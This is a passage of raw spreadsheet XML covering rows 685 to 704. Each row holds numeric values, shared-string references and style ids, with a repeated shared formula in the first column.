        <v>4.0</v>
      </c>
      <c r="H685" s="29">
        <v>1505.0</v>
      </c>
      <c r="I685" s="29">
        <v>12122.0</v>
      </c>
      <c r="J685" s="5" t="s">
        <v>3064</v>
      </c>
      <c r="K685" s="29">
        <v>12122.0</v>
      </c>
      <c r="L685" s="15"/>
      <c r="M685" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N685" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O685" s="29">
        <v>2.0</v>
      </c>
      <c r="P685" s="29">
        <v>2.0</v>
      </c>
      <c r="Q685" s="15"/>
      <c r="R685" s="15"/>
      <c r="S685" s="15"/>
      <c r="T685" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U685" s="5"/>
      <c r="V685" s="5"/>
      <c r="W685" s="47"/>
      <c r="X685" s="45"/>
      <c r="Y685" s="45"/>
      <c r="Z685" s="38" t="s">
        <v>3065</v>
      </c>
      <c r="AA685" s="39" t="s">
        <v>3066</v>
      </c>
      <c r="AB685" s="38" t="s">
        <v>3067</v>
      </c>
      <c r="AC685" s="40">
        <v>18474.0</v>
      </c>
      <c r="AD685" s="5"/>
      <c r="AE685" s="14"/>
      <c r="AF685" s="14"/>
    </row>
    <row r="686">
      <c r="A686" s="6">
        <f t="shared" si="1"/>
        <v>0.4993171044</v>
      </c>
      <c r="B686" s="29">
        <v>1.0</v>
      </c>
      <c r="C686" s="29">
        <v>121720.0</v>
      </c>
      <c r="D686" s="14"/>
      <c r="E686" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F686" s="14"/>
      <c r="G686" s="29">
        <v>8.0</v>
      </c>
      <c r="H686" s="29">
        <v>11876.0</v>
      </c>
      <c r="I686" s="29">
        <v>108944.0</v>
      </c>
      <c r="J686" s="15"/>
      <c r="K686" s="29">
        <v>108944.0</v>
      </c>
      <c r="L686" s="15"/>
      <c r="M686" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N686" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O686" s="29">
        <v>1.0</v>
      </c>
      <c r="P686" s="29">
        <v>8.0</v>
      </c>
      <c r="Q686" s="15"/>
      <c r="R686" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S686" s="15"/>
      <c r="T686" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U686" s="5"/>
      <c r="V686" s="5"/>
      <c r="W686" s="47"/>
      <c r="X686" s="45"/>
      <c r="Y686" s="45"/>
      <c r="Z686" s="38" t="s">
        <v>3068</v>
      </c>
      <c r="AA686" s="39" t="s">
        <v>3069</v>
      </c>
      <c r="AB686" s="38" t="s">
        <v>3070</v>
      </c>
      <c r="AC686" s="40">
        <v>121707.0</v>
      </c>
      <c r="AD686" s="5"/>
      <c r="AE686" s="14"/>
      <c r="AF686" s="14"/>
    </row>
    <row r="687">
      <c r="A687" s="6">
        <f t="shared" si="1"/>
        <v>0.4185109566</v>
      </c>
      <c r="B687" s="29">
        <v>1.0</v>
      </c>
      <c r="C687" s="29">
        <v>191834.0</v>
      </c>
      <c r="D687" s="14"/>
      <c r="E687" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F687" s="14"/>
      <c r="G687" s="29">
        <v>2.0</v>
      </c>
      <c r="H687" s="29">
        <v>198.0</v>
      </c>
      <c r="I687" s="29">
        <v>55982.0</v>
      </c>
      <c r="J687" s="15"/>
      <c r="K687" s="29">
        <v>55982.0</v>
      </c>
      <c r="L687" s="15"/>
      <c r="M687" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N687" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O687" s="29">
        <v>2.0</v>
      </c>
      <c r="P687" s="29">
        <v>0.0</v>
      </c>
      <c r="Q687" s="15"/>
      <c r="R687" s="15"/>
      <c r="S687" s="15"/>
      <c r="T687" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U687" s="5"/>
      <c r="V687" s="5"/>
      <c r="W687" s="47"/>
      <c r="X687" s="45"/>
      <c r="Y687" s="45"/>
      <c r="Z687" s="38" t="s">
        <v>3071</v>
      </c>
      <c r="AA687" s="39" t="s">
        <v>3072</v>
      </c>
      <c r="AB687" s="38" t="s">
        <v>3073</v>
      </c>
      <c r="AC687" s="40">
        <v>191833.0</v>
      </c>
      <c r="AD687" s="5"/>
      <c r="AE687" s="14"/>
      <c r="AF687" s="14"/>
    </row>
    <row r="688">
      <c r="A688" s="6">
        <f t="shared" si="1"/>
        <v>0.9650100999</v>
      </c>
      <c r="B688" s="29">
        <v>1.0</v>
      </c>
      <c r="C688" s="29">
        <v>205347.0</v>
      </c>
      <c r="D688" s="14"/>
      <c r="E688" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F688" s="14"/>
      <c r="G688" s="29">
        <v>26.0</v>
      </c>
      <c r="H688" s="29">
        <v>9562.0</v>
      </c>
      <c r="I688" s="29">
        <v>106901.0</v>
      </c>
      <c r="J688" s="15"/>
      <c r="K688" s="29">
        <v>106901.0</v>
      </c>
      <c r="L688" s="15"/>
      <c r="M688" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N688" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O688" s="29">
        <v>5.0</v>
      </c>
      <c r="P688" s="29">
        <v>5.0</v>
      </c>
      <c r="Q688" s="15"/>
      <c r="R688" s="15"/>
      <c r="S688" s="15"/>
      <c r="T688" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U688" s="5"/>
      <c r="V688" s="5"/>
      <c r="W688" s="47"/>
      <c r="X688" s="45"/>
      <c r="Y688" s="45"/>
      <c r="Z688" s="38" t="s">
        <v>3074</v>
      </c>
      <c r="AA688" s="39" t="s">
        <v>3075</v>
      </c>
      <c r="AB688" s="38" t="s">
        <v>1319</v>
      </c>
      <c r="AC688" s="40">
        <v>205340.0</v>
      </c>
      <c r="AD688" s="5"/>
      <c r="AE688" s="14"/>
      <c r="AF688" s="14"/>
    </row>
    <row r="689">
      <c r="A689" s="6">
        <f t="shared" si="1"/>
        <v>0.702736839</v>
      </c>
      <c r="B689" s="29">
        <v>1.0</v>
      </c>
      <c r="C689" s="14"/>
      <c r="D689" s="14"/>
      <c r="E689" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F689" s="14"/>
      <c r="G689" s="29">
        <v>2.0</v>
      </c>
      <c r="H689" s="29">
        <v>185.0</v>
      </c>
      <c r="I689" s="29">
        <v>202189.0</v>
      </c>
      <c r="J689" s="15"/>
      <c r="K689" s="29">
        <v>151903.0</v>
      </c>
      <c r="L689" s="15"/>
      <c r="M689" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N689" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O689" s="29">
        <v>2.0</v>
      </c>
      <c r="P689" s="29">
        <v>5.0</v>
      </c>
      <c r="Q689" s="15"/>
      <c r="R689" s="15"/>
      <c r="S689" s="15"/>
      <c r="T689" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U689" s="5"/>
      <c r="V689" s="5"/>
      <c r="W689" s="47"/>
      <c r="X689" s="45"/>
      <c r="Y689" s="45"/>
      <c r="Z689" s="38" t="s">
        <v>3076</v>
      </c>
      <c r="AA689" s="39" t="s">
        <v>3077</v>
      </c>
      <c r="AB689" s="38" t="s">
        <v>3078</v>
      </c>
      <c r="AC689" s="40">
        <v>205627.0</v>
      </c>
      <c r="AD689" s="5"/>
      <c r="AE689" s="14"/>
      <c r="AF689" s="14"/>
    </row>
    <row r="690">
      <c r="A690" s="6">
        <f t="shared" si="1"/>
        <v>0.4701935052</v>
      </c>
      <c r="B690" s="29">
        <v>1.0</v>
      </c>
      <c r="C690" s="29">
        <v>180547.0</v>
      </c>
      <c r="D690" s="14"/>
      <c r="E690" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F690" s="14"/>
      <c r="G690" s="29">
        <v>1.0</v>
      </c>
      <c r="H690" s="29">
        <v>168.0</v>
      </c>
      <c r="I690" s="29">
        <v>167909.0</v>
      </c>
      <c r="J690" s="15"/>
      <c r="K690" s="29">
        <v>98538.0</v>
      </c>
      <c r="L690" s="15"/>
      <c r="M690" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N690" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O690" s="29">
        <v>2.0</v>
      </c>
      <c r="P690" s="29">
        <v>5.0</v>
      </c>
      <c r="Q690" s="15"/>
      <c r="R690" s="15"/>
      <c r="S690" s="15"/>
      <c r="T690" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U690" s="5"/>
      <c r="V690" s="5"/>
      <c r="W690" s="47"/>
      <c r="X690" s="45"/>
      <c r="Y690" s="45"/>
      <c r="Z690" s="38" t="s">
        <v>3079</v>
      </c>
      <c r="AA690" s="39" t="s">
        <v>3080</v>
      </c>
      <c r="AB690" s="38" t="s">
        <v>1418</v>
      </c>
      <c r="AC690" s="40">
        <v>180546.0</v>
      </c>
      <c r="AD690" s="5"/>
      <c r="AE690" s="14"/>
      <c r="AF690" s="14"/>
    </row>
    <row r="691">
      <c r="A691" s="6">
        <f t="shared" si="1"/>
        <v>0.669132956</v>
      </c>
      <c r="B691" s="29">
        <v>1.0</v>
      </c>
      <c r="C691" s="15"/>
      <c r="D691" s="14"/>
      <c r="E691" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F691" s="14"/>
      <c r="G691" s="29">
        <v>2.0</v>
      </c>
      <c r="H691" s="29">
        <v>1446.0</v>
      </c>
      <c r="I691" s="29">
        <v>24287.0</v>
      </c>
      <c r="J691" s="15"/>
      <c r="K691" s="15"/>
      <c r="L691" s="15"/>
      <c r="M691" s="15"/>
      <c r="N691" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O691" s="29">
        <v>2.0</v>
      </c>
      <c r="P691" s="29">
        <v>0.0</v>
      </c>
      <c r="Q691" s="15"/>
      <c r="R691" s="15"/>
      <c r="S691" s="15"/>
      <c r="T691" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U691" s="5"/>
      <c r="V691" s="5"/>
      <c r="W691" s="47"/>
      <c r="X691" s="45"/>
      <c r="Y691" s="45"/>
      <c r="Z691" s="38" t="s">
        <v>3081</v>
      </c>
      <c r="AA691" s="39" t="s">
        <v>3082</v>
      </c>
      <c r="AB691" s="38" t="s">
        <v>3083</v>
      </c>
      <c r="AC691" s="40">
        <v>199170.0</v>
      </c>
      <c r="AD691" s="5"/>
      <c r="AE691" s="14"/>
      <c r="AF691" s="14"/>
    </row>
    <row r="692">
      <c r="A692" s="6">
        <f t="shared" si="1"/>
        <v>0.311464159</v>
      </c>
      <c r="B692" s="29">
        <v>1.0</v>
      </c>
      <c r="C692" s="29">
        <v>23240.0</v>
      </c>
      <c r="D692" s="14"/>
      <c r="E692" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F692" s="14"/>
      <c r="G692" s="29">
        <v>-1.0</v>
      </c>
      <c r="H692" s="29">
        <v>750.0</v>
      </c>
      <c r="I692" s="29">
        <v>15345.0</v>
      </c>
      <c r="J692" s="15"/>
      <c r="K692" s="29">
        <v>15345.0</v>
      </c>
      <c r="L692" s="15"/>
      <c r="M692" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N692" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O692" s="29">
        <v>2.0</v>
      </c>
      <c r="P692" s="29">
        <v>6.0</v>
      </c>
      <c r="Q692" s="15"/>
      <c r="R692" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S692" s="15"/>
      <c r="T692" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U692" s="5"/>
      <c r="V692" s="5"/>
      <c r="W692" s="47"/>
      <c r="X692" s="45"/>
      <c r="Y692" s="45"/>
      <c r="Z692" s="38" t="s">
        <v>3084</v>
      </c>
      <c r="AA692" s="39" t="s">
        <v>3085</v>
      </c>
      <c r="AB692" s="38" t="s">
        <v>3086</v>
      </c>
      <c r="AC692" s="40">
        <v>23235.0</v>
      </c>
      <c r="AD692" s="5"/>
      <c r="AE692" s="14"/>
      <c r="AF692" s="14"/>
    </row>
    <row r="693">
      <c r="A693" s="6">
        <f t="shared" si="1"/>
        <v>0.5845186318</v>
      </c>
      <c r="B693" s="29">
        <v>1.0</v>
      </c>
      <c r="C693" s="15"/>
      <c r="D693" s="14"/>
      <c r="E693" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F693" s="14"/>
      <c r="G693" s="29">
        <v>6.0</v>
      </c>
      <c r="H693" s="29">
        <v>300.0</v>
      </c>
      <c r="I693" s="29">
        <v>72327.0</v>
      </c>
      <c r="J693" s="15"/>
      <c r="K693" s="29">
        <v>32746.0</v>
      </c>
      <c r="L693" s="15"/>
      <c r="M693" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N693" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O693" s="29">
        <v>1.0</v>
      </c>
      <c r="P693" s="29">
        <v>9.0</v>
      </c>
      <c r="Q693" s="15"/>
      <c r="R693" s="15"/>
      <c r="S693" s="15"/>
      <c r="T693" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U693" s="5"/>
      <c r="V693" s="5"/>
      <c r="W693" s="47"/>
      <c r="X693" s="45"/>
      <c r="Y693" s="45"/>
      <c r="Z693" s="38" t="s">
        <v>3087</v>
      </c>
      <c r="AA693" s="39" t="s">
        <v>3088</v>
      </c>
      <c r="AB693" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC693" s="40">
        <v>108444.0</v>
      </c>
      <c r="AD693" s="5"/>
      <c r="AE693" s="14"/>
      <c r="AF693" s="14"/>
    </row>
    <row r="694">
      <c r="A694" s="6">
        <f t="shared" si="1"/>
        <v>0.8848060412</v>
      </c>
      <c r="B694" s="29">
        <v>1.0</v>
      </c>
      <c r="C694" s="14"/>
      <c r="D694" s="14"/>
      <c r="E694" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F694" s="14"/>
      <c r="G694" s="29">
        <v>3.0</v>
      </c>
      <c r="H694" s="29">
        <v>1210.0</v>
      </c>
      <c r="I694" s="29">
        <v>131956.0</v>
      </c>
      <c r="J694" s="15"/>
      <c r="K694" s="29">
        <v>111626.0</v>
      </c>
      <c r="L694" s="15"/>
      <c r="M694" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N694" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O694" s="29">
        <v>2.0</v>
      </c>
      <c r="P694" s="29">
        <v>3.0</v>
      </c>
      <c r="Q694" s="15"/>
      <c r="R694" s="15"/>
      <c r="S694" s="15"/>
      <c r="T694" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U694" s="5"/>
      <c r="V694" s="5"/>
      <c r="W694" s="47"/>
      <c r="X694" s="45"/>
      <c r="Y694" s="45"/>
      <c r="Z694" s="38" t="s">
        <v>3089</v>
      </c>
      <c r="AA694" s="39" t="s">
        <v>3090</v>
      </c>
      <c r="AB694" s="38" t="s">
        <v>3091</v>
      </c>
      <c r="AC694" s="40">
        <v>143897.0</v>
      </c>
      <c r="AD694" s="5"/>
      <c r="AE694" s="14"/>
      <c r="AF694" s="14"/>
    </row>
    <row r="695">
      <c r="A695" s="6">
        <f t="shared" si="1"/>
        <v>0.9703653015</v>
      </c>
      <c r="B695" s="29">
        <v>1.0</v>
      </c>
      <c r="C695" s="29">
        <v>168556.0</v>
      </c>
      <c r="D695" s="14"/>
      <c r="E695" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F695" s="14"/>
      <c r="G695" s="29">
        <v>13.0</v>
      </c>
      <c r="H695" s="29">
        <v>4042.0</v>
      </c>
      <c r="I695" s="29">
        <v>140657.0</v>
      </c>
      <c r="J695" s="15"/>
      <c r="K695" s="29">
        <v>91506.0</v>
      </c>
      <c r="L695" s="15"/>
      <c r="M695" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N695" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O695" s="29">
        <v>3.0</v>
      </c>
      <c r="P695" s="29">
        <v>4.0</v>
      </c>
      <c r="Q695" s="15"/>
      <c r="R695" s="15"/>
      <c r="S695" s="15"/>
      <c r="T695" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U695" s="5"/>
      <c r="V695" s="5"/>
      <c r="W695" s="47"/>
      <c r="X695" s="45"/>
      <c r="Y695" s="45"/>
      <c r="Z695" s="38" t="s">
        <v>3092</v>
      </c>
      <c r="AA695" s="39" t="s">
        <v>3093</v>
      </c>
      <c r="AB695" s="38" t="s">
        <v>3094</v>
      </c>
      <c r="AC695" s="40">
        <v>168543.0</v>
      </c>
      <c r="AD695" s="5"/>
      <c r="AE695" s="14"/>
      <c r="AF695" s="14"/>
    </row>
    <row r="696">
      <c r="A696" s="6">
        <f t="shared" si="1"/>
        <v>0.4179145795</v>
      </c>
      <c r="B696" s="29">
        <v>1.0</v>
      </c>
      <c r="C696" s="29">
        <v>140638.0</v>
      </c>
      <c r="D696" s="14"/>
      <c r="E696" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F696" s="14"/>
      <c r="G696" s="29">
        <v>10.0</v>
      </c>
      <c r="H696" s="29">
        <v>8147.0</v>
      </c>
      <c r="I696" s="29">
        <v>128400.0</v>
      </c>
      <c r="J696" s="15"/>
      <c r="K696" s="29">
        <v>98538.0</v>
      </c>
      <c r="L696" s="15"/>
      <c r="M696" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N696" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O696" s="29">
        <v>5.0</v>
      </c>
      <c r="P696" s="29">
        <v>8.0</v>
      </c>
      <c r="Q696" s="15"/>
      <c r="R696" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S696" s="15"/>
      <c r="T696" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U696" s="5"/>
      <c r="V696" s="5"/>
      <c r="W696" s="47"/>
      <c r="X696" s="45"/>
      <c r="Y696" s="45"/>
      <c r="Z696" s="38" t="s">
        <v>3095</v>
      </c>
      <c r="AA696" s="39" t="s">
        <v>3096</v>
      </c>
      <c r="AB696" s="38" t="s">
        <v>3097</v>
      </c>
      <c r="AC696" s="40">
        <v>140635.0</v>
      </c>
      <c r="AD696" s="5"/>
      <c r="AE696" s="14"/>
      <c r="AF696" s="14"/>
    </row>
    <row r="697">
      <c r="A697" s="6">
        <f t="shared" si="1"/>
        <v>0.1124773539</v>
      </c>
      <c r="B697" s="29">
        <v>1.0</v>
      </c>
      <c r="C697" s="15"/>
      <c r="D697" s="14"/>
      <c r="E697" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F697" s="14"/>
      <c r="G697" s="29">
        <v>2.0</v>
      </c>
      <c r="H697" s="29">
        <v>93.0</v>
      </c>
      <c r="I697" s="29">
        <v>152905.0</v>
      </c>
      <c r="J697" s="15"/>
      <c r="K697" s="29">
        <v>37315.0</v>
      </c>
      <c r="L697" s="15"/>
      <c r="M697" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N697" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O697" s="29">
        <v>1.0</v>
      </c>
      <c r="P697" s="29">
        <v>0.0</v>
      </c>
      <c r="Q697" s="15"/>
      <c r="R697" s="15"/>
      <c r="S697" s="15"/>
      <c r="T697" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U697" s="5"/>
      <c r="V697" s="5"/>
      <c r="W697" s="47"/>
      <c r="X697" s="45"/>
      <c r="Y697" s="45"/>
      <c r="Z697" s="38" t="s">
        <v>3098</v>
      </c>
      <c r="AA697" s="39" t="s">
        <v>3099</v>
      </c>
      <c r="AB697" s="38" t="s">
        <v>3100</v>
      </c>
      <c r="AC697" s="40">
        <v>219006.0</v>
      </c>
      <c r="AD697" s="5"/>
      <c r="AE697" s="14"/>
      <c r="AF697" s="14"/>
    </row>
    <row r="698">
      <c r="A698" s="6">
        <f t="shared" si="1"/>
        <v>0.1194387249</v>
      </c>
      <c r="B698" s="29">
        <v>1.0</v>
      </c>
      <c r="C698" s="29">
        <v>6835.0</v>
      </c>
      <c r="D698" s="14"/>
      <c r="E698" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F698" s="14"/>
      <c r="G698" s="29">
        <v>15.0</v>
      </c>
      <c r="H698" s="29">
        <v>10485.0</v>
      </c>
      <c r="I698" s="29">
        <v>396.0</v>
      </c>
      <c r="J698" s="15"/>
      <c r="K698" s="15"/>
      <c r="L698" s="15"/>
      <c r="M698" s="14"/>
      <c r="N698" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O698" s="29">
        <v>2.0</v>
      </c>
      <c r="P698" s="29">
        <v>0.0</v>
      </c>
      <c r="Q698" s="15"/>
      <c r="R698" s="15"/>
      <c r="S698" s="15"/>
      <c r="T698" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U698" s="5"/>
      <c r="V698" s="5"/>
      <c r="W698" s="47"/>
      <c r="X698" s="45"/>
      <c r="Y698" s="45"/>
      <c r="Z698" s="38" t="s">
        <v>3101</v>
      </c>
      <c r="AA698" s="39" t="s">
        <v>3102</v>
      </c>
      <c r="AB698" s="38" t="s">
        <v>3103</v>
      </c>
      <c r="AC698" s="40">
        <v>6827.0</v>
      </c>
      <c r="AD698" s="5"/>
      <c r="AE698" s="14"/>
      <c r="AF698" s="14"/>
    </row>
    <row r="699">
      <c r="A699" s="6">
        <f t="shared" si="1"/>
        <v>0.00008450650175</v>
      </c>
      <c r="B699" s="29">
        <v>1.0</v>
      </c>
      <c r="C699" s="14"/>
      <c r="D699" s="14"/>
      <c r="E699" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F699" s="14"/>
      <c r="G699" s="29">
        <v>-1.0</v>
      </c>
      <c r="H699" s="29">
        <v>276.0</v>
      </c>
      <c r="I699" s="29">
        <v>90518.0</v>
      </c>
      <c r="J699" s="15"/>
      <c r="K699" s="15"/>
      <c r="L699" s="15"/>
      <c r="M699" s="15"/>
      <c r="N699" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O699" s="29">
        <v>2.0</v>
      </c>
      <c r="P699" s="29">
        <v>0.0</v>
      </c>
      <c r="Q699" s="15"/>
      <c r="R699" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S699" s="15"/>
      <c r="T699" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U699" s="5"/>
      <c r="V699" s="5"/>
      <c r="W699" s="47"/>
      <c r="X699" s="45"/>
      <c r="Y699" s="45"/>
      <c r="Z699" s="38" t="s">
        <v>3104</v>
      </c>
      <c r="AA699" s="39" t="s">
        <v>3105</v>
      </c>
      <c r="AB699" s="38" t="s">
        <v>2305</v>
      </c>
      <c r="AC699" s="40">
        <v>104001.0</v>
      </c>
      <c r="AD699" s="5"/>
      <c r="AE699" s="14"/>
      <c r="AF699" s="14"/>
    </row>
    <row r="700">
      <c r="A700" s="6">
        <f t="shared" si="1"/>
        <v>0.8034238032</v>
      </c>
      <c r="B700" s="29">
        <v>1.0</v>
      </c>
      <c r="C700" s="14"/>
      <c r="D700" s="14"/>
      <c r="E700" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F700" s="14"/>
      <c r="G700" s="29">
        <v>0.0</v>
      </c>
      <c r="H700" s="29">
        <v>93.0</v>
      </c>
      <c r="I700" s="29">
        <v>220417.0</v>
      </c>
      <c r="J700" s="15"/>
      <c r="K700" s="15"/>
      <c r="L700" s="15"/>
      <c r="M700" s="15"/>
      <c r="N700" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O700" s="29">
        <v>0.0</v>
      </c>
      <c r="P700" s="29">
        <v>4.0</v>
      </c>
      <c r="Q700" s="15"/>
      <c r="R700" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S700" s="15"/>
      <c r="T700" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U700" s="5"/>
      <c r="V700" s="5"/>
      <c r="W700" s="47"/>
      <c r="X700" s="45"/>
      <c r="Y700" s="45"/>
      <c r="Z700" s="38" t="s">
        <v>3106</v>
      </c>
      <c r="AA700" s="39" t="s">
        <v>3107</v>
      </c>
      <c r="AB700" s="38" t="s">
        <v>3108</v>
      </c>
      <c r="AC700" s="40">
        <v>220113.0</v>
      </c>
      <c r="AD700" s="5"/>
      <c r="AE700" s="14"/>
      <c r="AF700" s="14"/>
    </row>
    <row r="701">
      <c r="A701" s="6">
        <f t="shared" si="1"/>
        <v>0.5187819667</v>
      </c>
      <c r="B701" s="29">
        <v>1.0</v>
      </c>
      <c r="C701" s="29">
        <v>183336.0</v>
      </c>
      <c r="D701" s="14"/>
      <c r="E701" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F701" s="14"/>
      <c r="G701" s="29">
        <v>0.0</v>
      </c>
      <c r="H701" s="29">
        <v>164.0</v>
      </c>
      <c r="I701" s="29">
        <v>175021.0</v>
      </c>
      <c r="J701" s="15"/>
      <c r="K701" s="15"/>
      <c r="L701" s="15"/>
      <c r="M701" s="14"/>
      <c r="N701" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O701" s="29">
        <v>3.0</v>
      </c>
      <c r="P701" s="29">
        <v>3.0</v>
      </c>
      <c r="Q701" s="15"/>
      <c r="R701" s="15"/>
      <c r="S701" s="15"/>
      <c r="T701" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U701" s="5"/>
      <c r="V701" s="5"/>
      <c r="W701" s="47"/>
      <c r="X701" s="45"/>
      <c r="Y701" s="45"/>
      <c r="Z701" s="38" t="s">
        <v>3109</v>
      </c>
      <c r="AA701" s="39" t="s">
        <v>3110</v>
      </c>
      <c r="AB701" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC701" s="40">
        <v>183126.0</v>
      </c>
      <c r="AD701" s="5"/>
      <c r="AE701" s="14"/>
      <c r="AF701" s="14"/>
    </row>
    <row r="702">
      <c r="A702" s="6">
        <f t="shared" si="1"/>
        <v>0.6120308921</v>
      </c>
      <c r="B702" s="29">
        <v>1.0</v>
      </c>
      <c r="C702" s="14"/>
      <c r="D702" s="14"/>
      <c r="E702" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F702" s="14"/>
      <c r="G702" s="29">
        <v>1.0</v>
      </c>
      <c r="H702" s="29">
        <v>36.0</v>
      </c>
      <c r="I702" s="29">
        <v>292981.0</v>
      </c>
      <c r="J702" s="15"/>
      <c r="K702" s="29">
        <v>292981.0</v>
      </c>
      <c r="L702" s="15"/>
      <c r="M702" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N702" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O702" s="29">
        <v>0.0</v>
      </c>
      <c r="P702" s="29">
        <v>3.0</v>
      </c>
      <c r="Q702" s="15"/>
      <c r="R702" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S702" s="15"/>
      <c r="T702" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U702" s="5"/>
      <c r="V702" s="5"/>
      <c r="W702" s="47"/>
      <c r="X702" s="45"/>
      <c r="Y702" s="45"/>
      <c r="Z702" s="38" t="s">
        <v>3111</v>
      </c>
      <c r="AA702" s="39" t="s">
        <v>3112</v>
      </c>
      <c r="AB702" s="38" t="s">
        <v>3113</v>
      </c>
      <c r="AC702" s="40">
        <v>270262.0</v>
      </c>
      <c r="AD702" s="5"/>
      <c r="AE702" s="14"/>
      <c r="AF702" s="14"/>
    </row>
    <row r="703">
      <c r="A703" s="6">
        <f t="shared" si="1"/>
        <v>0.8941220211</v>
      </c>
      <c r="B703" s="29">
        <v>1.0</v>
      </c>
      <c r="C703" s="15"/>
      <c r="D703" s="14"/>
      <c r="E703" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F703" s="14"/>
      <c r="G703" s="29">
        <v>3.0</v>
      </c>
      <c r="H703" s="29">
        <v>1196.0</v>
      </c>
      <c r="I703" s="29">
        <v>37638.0</v>
      </c>
      <c r="J703" s="15"/>
      <c r="K703" s="29">
        <v>6253.0</v>
      </c>
      <c r="L703" s="15"/>
      <c r="M703" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N703" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O703" s="29">
        <v>1.0</v>
      </c>
      <c r="P703" s="29">
        <v>5.0</v>
      </c>
      <c r="Q703" s="15"/>
      <c r="R703" s="15"/>
      <c r="S703" s="15"/>
      <c r="T703" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U703" s="5"/>
      <c r="V703" s="5"/>
      <c r="W703" s="47"/>
      <c r="X703" s="45"/>
      <c r="Y703" s="45"/>
      <c r="Z703" s="38" t="s">
        <v>3114</v>
      </c>
      <c r="AA703" s="39" t="s">
        <v>3115</v>
      </c>
      <c r="AB703" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC703" s="40">
        <v>61200.0</v>
      </c>
      <c r="AD703" s="5"/>
      <c r="AE703" s="14"/>
      <c r="AF703" s="14"/>
    </row>
    <row r="704">
      <c r="A704" s="6">
        <f t="shared" si="1"/>
        <v>0.8179190897</v>
      </c>
      <c r="B704" s="29">
        <v>1.0</v>
      </c>
      <c r="C704" s="15"/>
      <c r="D704" s="14"/>
      <c r="E704" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F704" s="14"/>
      <c r="G704" s="29">
        <v>1.0</v>
      </c>
      <c r="H704" s="29">
        <v>212.0</v>
      </c>
      <c r="I704" s="29">
        <v>245899.0</v>
      </c>
      <c r="J704" s="15"/>
      <c r="K704" s="29">
        <v>6253.0</v>
      </c>
      <c r="L704" s="15"/>
      <c r="M704" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N704" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O704" s="29">
        <v>1.0</v>
      </c>
      <c r="P704" s="29">
        <v>0.0</v>
      </c>
      <c r="Q704" s="15"/>
      <c r="R704" s="15"/>
      <c r="S704" s="15"/>
      <c r="T704" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U704" s="5"/>
      <c r="V704" s="5"/>
      <c r="W704" s="47"/>
